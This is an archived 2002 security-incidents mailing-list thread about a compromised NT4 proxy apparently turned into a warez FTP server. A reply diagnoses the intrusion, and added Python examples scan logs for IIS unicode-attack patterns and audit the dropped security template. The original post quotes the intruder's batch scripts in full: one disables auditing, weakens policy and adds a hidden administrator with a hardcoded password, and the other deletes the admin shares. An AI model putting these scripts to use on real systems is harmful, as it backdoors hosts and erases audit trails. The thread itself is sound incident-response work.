Security Incidents mailing list archives

RE: Proxy server hit... Any ideas?


From: Othenin-Girard Pascal <pascal.othenin-girard () lausanne ch>
Date: Wed, 20 Nov 2002 09:16:15 +0100

Hello,

Well, I would say that you've probably been hacked in order for the
warez scene to distribute some stuff...

        2. temp, servUDaemon.ini, services.exe, servUStartUpLog.txt, in,
        srvss.exe, start.exe, BugSlayerUtil.dll (says it's a Bugslayer Utility
        Routine), and _zoLibr.dll

and you're probably running a Serv-U FTP server. Doing a "netstat -an" should
list all connections of the machine, where you should see if more services
than needed are running. And check for some *.rar, *.zip; if you are
distributing warez you should find some GB of those somewhere.

Other files have been renamed in order to attempt to obfuscate the real
files' usage. I bet you are also hosting some kind of iroffer (an IRC bot
doing XDCC serving).

To be sure of that, you can grab the file

http://linux20368.dn.net/protools/files/utilities/fi.zip
(this is an exe file identifier; it will identify the packer if it knows it)

and see what it reports for each file you've found. Most probably the files are
packed; a good bet would be UPX. Grab it from the main web site, and you
may be able to unpack the files using the command upx -d <new_dumped_exe>

From there you can take the files into any hex editor/disassembler in order
to find a way to identify the product. File properties may be sufficient for
this.
Once you've done that, you should have a good idea of what has been
installed, in which order; the last point is to find out how they first
came in.

Are you running IIS on your proxy? (\scripts\sample\) If so you've probably
been hit by a unicode attack. Search for the following pattern in your
proxy log file:
"cmd.exe" or "/dir+c" (this is the usual vuln test). And if you found some
installed stuff like an FTP server, bots, and found tracks of the attack in
your log, then a good bet would be that the attack has been successful...

Hope this helps.
Regards,
P.Girard

P.S. You should definitely remove the sample script folder from a
production computer. Not a good idea to keep them. You should also try
the Microsoft Lockdown tools, which do a good job securing IIS...
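The log search suggested in the reply, as an added example that is not part of the original message: it applies the "cmd.exe" / "dir+c" / sample-folder patterns to W3C-style proxy or IIS log lines after percent-decoding them, and records whether the server answered 200 to a cmd.exe request, which is the best hint the log itself gives that the probe ran. The log lines and the column layout are constructed for this example.

```python
from urllib.parse import unquote

# Constructed W3C-style lines (date time client method uri query status); made up for
# this example, not taken from the original post.
SAMPLE_LOG = """\
2002-11-08 03:12:44 10.0.0.7 GET /scripts/..%c0%af../winnt/system32/cmd.exe /c+dir+c:\\ 200
2002-11-08 03:12:51 10.0.0.7 GET /scripts/..%255c../winnt/system32/cmd.exe /c+dir+c:\\ 200
2002-11-08 03:13:02 10.0.0.7 GET /scripts/samples/ctguestb.idc - 404
2002-11-08 03:14:10 10.0.0.9 GET /index.html - 200
"""

# Indicators named in the thread: cmd.exe, the dir+c probe, and the IIS sample-script folder.
INDICATORS = ("cmd.exe", "dir+c", "/scripts/sample")

def normalize(s: str) -> str:
    """Lower-case and percent-decode until stable, so a double-encoded path (%255c)
    collapses to the same text a plain search would expect to find."""
    s = s.lower()
    for _ in range(3):
        decoded = unquote(s, errors="replace")
        if decoded == s:
            break
        s = decoded
    return s

def scan_proxy_log(text: str) -> list:
    """One dict per suspicious line: indicators matched, whether the path walks
    upward with '..', and whether the server returned 200 to a cmd.exe request."""
    hits = []
    for n, line in enumerate(text.splitlines(), 1):
        parts = line.split()
        if len(parts) < 7:
            continue                      # not a request line in the assumed layout
        client, uri, query, status = parts[2], parts[4], parts[5], parts[6]
        req = normalize(uri + " " + query)
        matched = [i for i in INDICATORS if i in req]
        if matched:
            hits.append({"line": n, "client": client, "indicators": matched,
                         "traversal": ".." in req,
                         "executed": "cmd.exe" in matched and status == "200"})
    return hits

if __name__ == "__main__":
    for hit in scan_proxy_log(SAMPLE_LOG):
        print(hit)
```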



-----Original Message-----
From: Mike Cain [SMTP:mikec () lpinsurance com]
Date: Monday, 18 November 2002 15:01
To:   incidents () securityfocus com
Subject:      Proxy server hit... Any ideas?

Well, I have had my first run-in with a hacker, or was it a virus? I'm
not 100% sure.. Guess I should start from the beginning...

A few days ago, I began to get user complaints on the slowness of the
internet. I figured it was mostly them just wanting something to
complain about, so I did what all crappy admins do, I ignored it. Well,
last night the box was rebooted after some software was updated. Today
people were complaining about how PAINFULLY slow the internet was, so I
looked at the proxy server. NT4 running Proxy 3. I know, there is newer,
better stuff, but it's what I have to work with. :) SO... I looked at the
processes and noticed the CPU hovering at 35-50%.. Way too high. So a
quick look at the process list showed two things that I didn't remember
needing to be there, win.exe and start.exe. Next move was to find them,
and they were in the winnt\system\ folder. What I also found odd was
that there were three new folders in that directory, all created on the
8th: NT, tools, and win.

Here are the contents, respectively.
1. 1fg.dll, 1gno32.dll, 1s.dll, 1t.exe(antivirus sees this one as a
backdoor Trojan), 132.dll, 1gn32.dll, 1idv32.dll, 1sf32.dll, 1ygwin1.dll
(says it's a Cygwin POSIX Emulation DLL), 132.dll.bkup

2. temp, servUDaemon.ini, services.exe, servUStartUpLog.txt, in,
srvss.exe, start.exe, BugSlayerUtil.dll (says it's a Bugslayer Utility
Routine), and _zoLibr.dll

3. (folder) FL, cygwin.dll, MS.dll, secure.bat (see below), temp,
x32.dll, cfg.dll, IGNo32.dll, secure1.bat (see below) pidv32.dll,
win.exe, x32.dll.bkup

SO, anyone know what I have or what hit me? From looking at the secure
and secure1 batch files, it looks like a root kit... But I'm new at
this side of security (I'm a Cisco guy...)

Last thing, the logs show that the attacker was hitting the
\scripts\sample\ folder... Meaning I think he was trying to use the old
IIS Sample Scripts to execute local code... Not sure if he was
successful...

Thanks in advance!!

Mike Cain
CCNP/MCSE


Secure.bat =
@echo off
del temp
echo Compiling New Security Policy ...
echo [Version] >> temp
echo signature="$CHICAGO$" >> temp
echo Revision=1 >> temp
echo [Profile Description] >> temp
echo Description=Default Security Settings. (Windows 2000 Professional) >> temp
echo [System Access] >> temp
echo MinimumPasswordAge = 0 >> temp
echo MaximumPasswordAge = 42 >> temp
echo MinimumPasswordLength = 0 >> temp
echo PasswordComplexity = 0 >> temp
echo PasswordHistorySize = 0 >> temp
echo LockoutBadCount = 0 >> temp
echo RequireLogonToChangePassword = 0 >> temp
echo ClearTextPassword = 0 >> temp
echo [Event Audit] >> temp
echo AuditSystemEvents = 0 >> temp
echo AuditLogonEvents = 0 >> temp
echo AuditObjectAccess = 0 >> temp
echo AuditPrivilegeUse = 0 >> temp
echo AuditPolicyChange = 0 >> temp
echo AuditAccountManage = 0 >> temp
echo AuditProcessTracking = 0 >> temp
echo AuditDSAccess = 0 >> temp
echo AuditAccountLogon = 0 >> temp
echo [Registry Values] >> temp
echo machine\system\currentcontrolset\services\netlogon\parameters\signsecurechannel=4,1 >> temp
echo machine\system\currentcontrolset\services\netlogon\parameters\sealsecurechannel=4,1 >> temp
echo machine\system\currentcontrolset\services\netlogon\parameters\requirestrongkey=4,0 >> temp
echo machine\system\currentcontrolset\services\netlogon\parameters\requiresignorseal=4,0 >> temp
echo machine\system\currentcontrolset\services\netlogon\parameters\disablepasswordchange=4,0 >> temp
echo machine\system\currentcontrolset\services\lanmanworkstation\parameters\requiresecuritysignature=4,0 >> temp
echo machine\system\currentcontrolset\services\lanmanworkstation\parameters\enablesecuritysignature=4,1 >> temp
echo machine\system\currentcontrolset\services\lanmanworkstation\parameters\enableplaintextpassword=4,0 >> temp
echo machine\system\currentcontrolset\services\lanmanserver\parameters\requiresecuritysignature=4,0 >> temp
echo machine\system\currentcontrolset\services\lanmanserver\parameters\enablesecuritysignature=4,0 >> temp
echo machine\system\currentcontrolset\services\lanmanserver\parameters\enableforcedlogoff=4,1 >> temp
echo machine\system\currentcontrolset\services\lanmanserver\parameters\autodisconnect=4,15 >> temp
echo machine\system\currentcontrolset\control\session manager\protectionmode=4,1 >> temp
echo machine\system\currentcontrolset\control\session manager\memory management\clearpagefileatshutdown=4,0 >> temp
echo machine\system\currentcontrolset\control\print\providers\lanman print services\servers\addprinterdrivers=4,0 >> temp
echo machine\system\currentcontrolset\control\lsa\restrictanonymous=4,0 >> temp
echo machine\system\currentcontrolset\control\lsa\lmcompatibilitylevel=4,0 >> temp
echo machine\system\currentcontrolset\control\lsa\fullprivilegeauditing=3,0 >> temp
echo machine\system\currentcontrolset\control\lsa\crashonauditfail=4,0 >> temp
echo machine\system\currentcontrolset\control\lsa\auditbaseobjects=4,0 >> temp
echo machine\software\microsoft\windows\currentversion\policies\system\shutdownwithoutlogon=4,1 >> temp
echo machine\software\microsoft\windows\currentversion\policies\system\legalnoticetext=1, >> temp
echo machine\software\microsoft\windows\currentversion\policies\system\legalnoticecaption=1, >> temp
echo machine\software\microsoft\windows\currentversion\policies\system\dontdisplaylastusername=4,0 >> temp
echo machine\software\microsoft\windows nt\currentversion\winlogon\scremoveoption=1,0 >> temp
echo machine\software\microsoft\windows nt\currentversion\winlogon\passwordexpirywarning=4,14 >> temp
echo machine\software\microsoft\windows nt\currentversion\winlogon\cachedlogonscount=1,10 >> temp
echo machine\software\microsoft\windows nt\currentversion\winlogon\allocatefloppies=1,0 >> temp
echo machine\software\microsoft\windows nt\currentversion\winlogon\allocatedasd=1,0 >> temp
echo machine\software\microsoft\windows nt\currentversion\winlogon\allocatecdroms=1,0 >> temp
echo machine\software\microsoft\windows nt\currentversion\setup\recoveryconsole\setcommand=4,0 >> temp
echo machine\software\microsoft\windows nt\currentversion\setup\recoveryconsole\securitylevel=4,0 >> temp
echo [Privilege Rights] >> temp
echo seassignprimarytokenprivilege = >> temp
echo seauditprivilege = >> temp
echo sebackupprivilege = *S-1-5-32-544,*S-1-5-32-551 >> temp
echo sebatchlogonright = >> temp
echo sechangenotifyprivilege = *S-1-5-32-544,*S-1-5-32-551,*S-1-5-32-547,*S-1-5-32-545,*S-1-1-0 >> temp
echo secreatepagefileprivilege = *S-1-5-32-544 >> temp
echo secreatepermanentprivilege = >> temp
echo secreatetokenprivilege = >> temp
echo sedebugprivilege = *S-1-5-32-544 >> temp
echo sedenybatchlogonright = >> temp
echo sedenyinteractivelogonright = >> temp
echo sedenynetworklogonright = >> temp
echo sedenyservicelogonright = >> temp
echo seenabledelegationprivilege = >> temp
echo seincreasebasepriorityprivilege = *S-1-5-32-544 >> temp
echo seincreasequotaprivilege = *S-1-5-32-544 >> temp
echo seinteractivelogonright = *S-1-5-32-544,*S-1-5-32-551,*S-1-5-32-547,*S-1-5-32-545,*S-1-5-21-1960408961-1637723038-1801674531-501 >> temp
echo seloaddriverprivilege = *S-1-5-32-544 >> temp
echo selockmemoryprivilege = >> temp
echo semachineaccountprivilege = >> temp
echo senetworklogonright = %1 >> temp
echo seprofilesingleprocessprivilege = *S-1-5-32-544,*S-1-5-32-547 >> temp
echo seremoteshutdownprivilege = *S-1-5-32-544 >> temp
echo serestoreprivilege = *S-1-5-32-544,*S-1-5-32-551 >> temp
echo sesecurityprivilege = *S-1-5-32-544 >> temp
echo seservicelogonright = >> temp
echo seshutdownprivilege = *S-1-5-32-544,*S-1-5-32-551,*S-1-5-32-547,*S-1-5-32-545 >> temp
echo sesyncagentprivilege = >> temp
echo sesystemenvironmentprivilege = *S-1-5-32-544 >> temp
echo sesystemprofileprivilege = *S-1-5-32-544 >> temp
echo sesystemtimeprivilege = *S-1-5-32-544,*S-1-5-32-547 >> temp
echo setakeownershipprivilege = *S-1-5-32-544 >> temp
echo setcbprivilege = >> temp
echo seundockprivilege = *S-1-5-32-544,*S-1-5-32-547,*S-1-5-32-545 >> temp
echo Adding User %1 with the Password %2 ...
net user /add slash 971985
echo Adding slash to the Local Administrator Group ...
net localgroup administrators slash /add
echo Loading New Security Policy ...
secedit.exe /configure /areas USER_RIGHTS /db C:\winnt\temp\temp.mdb /CFG temp
echo System is now secure.



Secure1.bat

net share /delete C$ /y > net.deld
net share /delete D$ /y >> net.deld
net share /delete E$ /y >> net.deld
net share /delete F$ /y >> net.deld
net share /delete G$ /y >> net.deld
net share /delete H$ /y >> net.deld
net share /delete I$ /y >> net.deld
net share /delete J$ /y >> net.deld
net share /delete K$ /y >> net.deld
net share /delete L$ /y >> net.deld
net share /delete M$ /y >> net.deld
net share /delete N$ /y >> net.deld
net share /delete O$ /y >> net.deld
net share /delete P$ /y >> net.deld
net share /delete Q$ /y >> net.deld
net share /delete R$ /y >> net.deld
net share /delete S$ /y >> net.deld
net share /delete T$ /y >> net.deld
net share /delete U$ /y >> net.deld
net share /delete V$ /y >> net.deld
net share /delete W$ /y >> net.deld
net share /delete X$ /y >> net.deld
net share /delete Y$ /y >> net.deld
net share /delete Z$ /y >> net.deld
net share /delete ADMIN$ /y >> net.deld
#net share /delete IPC$ /y >> net.deld
del net.deld
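For triaging a dropped "policy" like the secure.bat above, an added example (not from the post or either author): it parses the secedit template that script echoes into "temp" and reports every setting weaker than a hardening baseline, including audit categories switched off, anonymous enumeration re-enabled, and logon rights handed to the local Guest account (RID 501). The excerpt is constructed from the script's own echo lines, and the baseline floors are assumptions for this example.

```python
# Constructed excerpt of the template secure.bat above echoes into "temp" (copied from it, not a real host).
TEMPLATE = """\
[System Access]
MinimumPasswordLength = 0
PasswordComplexity = 0
[Event Audit]
AuditLogonEvents = 0
[Registry Values]
machine\\system\\currentcontrolset\\control\\lsa\\restrictanonymous=4,0
machine\\system\\currentcontrolset\\control\\lsa\\lmcompatibilitylevel=4,0
[Privilege Rights]
seinteractivelogonright = *S-1-5-32-544,*S-1-5-32-545,*S-1-5-21-1960408961-1637723038-1801674531-501
"""
# Floors a hardened host would not go below (an assumed baseline for this example only).
MIN_SYSTEM_ACCESS = {"minimumpasswordlength": 8, "passwordcomplexity": 1}
MIN_REGISTRY = {"restrictanonymous": 1, "lmcompatibilitylevel": 2}
RISKY_RIDS = {"501": "Guest"}  # well-known RID at the end of an account SID

def parse_inf(text: str) -> dict:
    """Parse [section] / key=value lines into {section: {key: value}}, keys lower-cased."""
    cfg, section = {}, None
    for line in (l.strip() for l in text.splitlines() if l.strip()):
        if line.startswith("["):
            section = line.strip("[]").lower()
            cfg[section] = {}
        elif "=" in line and section:
            key, _, value = line.partition("=")
            cfg[section][key.strip().lower()] = value.strip()
    return cfg

def audit_template(text: str) -> list:
    """Return one finding per setting that weakens the host relative to the baseline."""
    cfg, findings = parse_inf(text), []
    for key, val in cfg.get("system access", {}).items():
        if key in MIN_SYSTEM_ACCESS and int(val) < MIN_SYSTEM_ACCESS[key]:
            findings.append(f"{key} lowered to {val}")
    for key, val in cfg.get("event audit", {}).items():
        if val == "0":
            findings.append(f"{key} disabled")
    for path, val in cfg.get("registry values", {}).items():
        name = path.rsplit("\\", 1)[-1]      # value name after the last backslash
        data = val.partition(",")[2]          # "4,0" -> type 4 (REG_DWORD), data "0"
        if name in MIN_REGISTRY and int(data) < MIN_REGISTRY[name]:
            findings.append(f"{name} set to {data}")
    for right, sids in cfg.get("privilege rights", {}).items():
        for sid in (s.strip().lstrip("*") for s in sids.split(",") if s.strip()):
            rid = sid.rsplit("-", 1)[-1]
            if right.endswith("logonright") and sid.startswith("S-1-5-21-") and rid in RISKY_RIDS:
                findings.append(f"{right} granted to {RISKY_RIDS[rid]} account {sid}")
    return findings
```

Run it against the full template the batch writes (save the echoed "temp" file and pass its contents) to get the complete list; the excerpt here keeps only one line per category.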



----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management
and tracking system please see: http://aris.securityfocus.com
